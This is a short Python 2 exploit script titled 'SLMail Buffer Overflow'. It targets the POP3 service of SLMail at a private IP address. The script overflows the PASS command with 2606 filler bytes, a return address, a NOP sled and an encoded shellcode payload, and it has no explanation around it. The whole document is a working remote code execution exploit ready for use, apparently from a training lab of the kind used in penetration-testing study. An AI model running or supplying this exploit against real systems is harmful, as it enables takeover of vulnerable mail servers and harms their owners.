SLMail Buffer Overflow

slmailexploit.py

#!/usr/bin/python
import socket
# Final Exploit
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
shellcode = ("\xdb\xcd\xbf\x3b\x30\xa2\x04\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
"\x52\x31\x7d\x17\x03\x7d\x17\x83\xd6\xcc\x40\xf1\xd4\xc5\x07"
"\xfa\x24\x16\x68\x72\xc1\x27\xa8\xe0\x82\x18\x18\x62\xc6\x94"
"\xd3\x26\xf2\x2f\x91\xee\xf5\x98\x1c\xc9\x38\x18\x0c\x29\x5b"
"\x9a\x4f\x7e\xbb\xa3\x9f\x73\xba\xe4\xc2\x7e\xee\xbd\x89\x2d"
"\x1e\xc9\xc4\xed\x95\x81\xc9\x75\x4a\x51\xeb\x54\xdd\xe9\xb2"
"\x76\xdc\x3e\xcf\x3e\xc6\x23\xea\x89\x7d\x97\x80\x0b\x57\xe9"
"\x69\xa7\x96\xc5\x9b\xb9\xdf\xe2\x43\xcc\x29\x11\xf9\xd7\xee"
"\x6b\x25\x5d\xf4\xcc\xae\xc5\xd0\xed\x63\x93\x93\xe2\xc8\xd7"
"\xfb\xe6\xcf\x34\x70\x12\x5b\xbb\x56\x92\x1f\x98\x72\xfe\xc4"
"\x81\x23\x5a\xaa\xbe\x33\x05\x13\x1b\x38\xa8\x40\x16\x63\xa5"
"\xa5\x1b\x9b\x35\xa2\x2c\xe8\x07\x6d\x87\x66\x24\xe6\x01\x71"
"\x4b\xdd\xf6\xed\xb2\xde\x06\x24\x71\x8a\x56\x5e\x50\xb3\x3c"
"\x9e\x5d\x66\x92\xce\xf1\xd9\x53\xbe\xb1\x89\x3b\xd4\x3d\xf5"
"\x5c\xd7\x97\x9e\xf7\x22\x70\x61\xaf\x2d\xfb\x09\xb2\x2d\xfa"
"\x72\x3b\xcb\x96\x94\x6a\x44\x0f\x0c\x37\x1e\xae\xd1\xed\x5b"
"\xf0\x5a\x02\x9c\xbf\xaa\x6f\x8e\x28\x5b\x3a\xec\xff\x64\x90"
"\x98\x9c\xf7\x7f\x58\xea\xeb\xd7\x0f\xbb\xda\x21\xc5\x51\x44"
"\x98\xfb\xab\x10\xe3\xbf\x77\xe1\xea\x3e\xf5\x5d\xc9\x50\xc3"
"\x5e\x55\x04\x9b\x08\x03\xf2\x5d\xe3\xe5\xac\x37\x58\xac\x38"
"\xc1\x92\x6f\x3e\xce\xfe\x19\xde\x7f\x57\x5c\xe1\xb0\x3f\x68"
"\x9a\xac\xdf\x97\x71\x75\xef\xdd\xdb\xdc\x78\xb8\x8e\x5c\xe5"
"\x3b\x65\xa2\x10\xb8\x8f\x5b\xe7\xa0\xfa\x5e\xa3\x66\x17\x13"
"\xbc\x02\x17\x80\xbd\x06")
buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + '\x90' * 20 + shellcode

try:
	print "\nSending Shellcode..."
	s.connect(('192.168.1.200',110))
	data = s.recv(1024)
	
	s.send('USER test' +'\r\n')
	data = s.recv(1024)
	
	s.send('PASS ' + buffer + '\r\n')
	print "\nSent Sucessfully"

except socket.timeout:
	print "Could not connect to POP3 Service!"
	exit(0)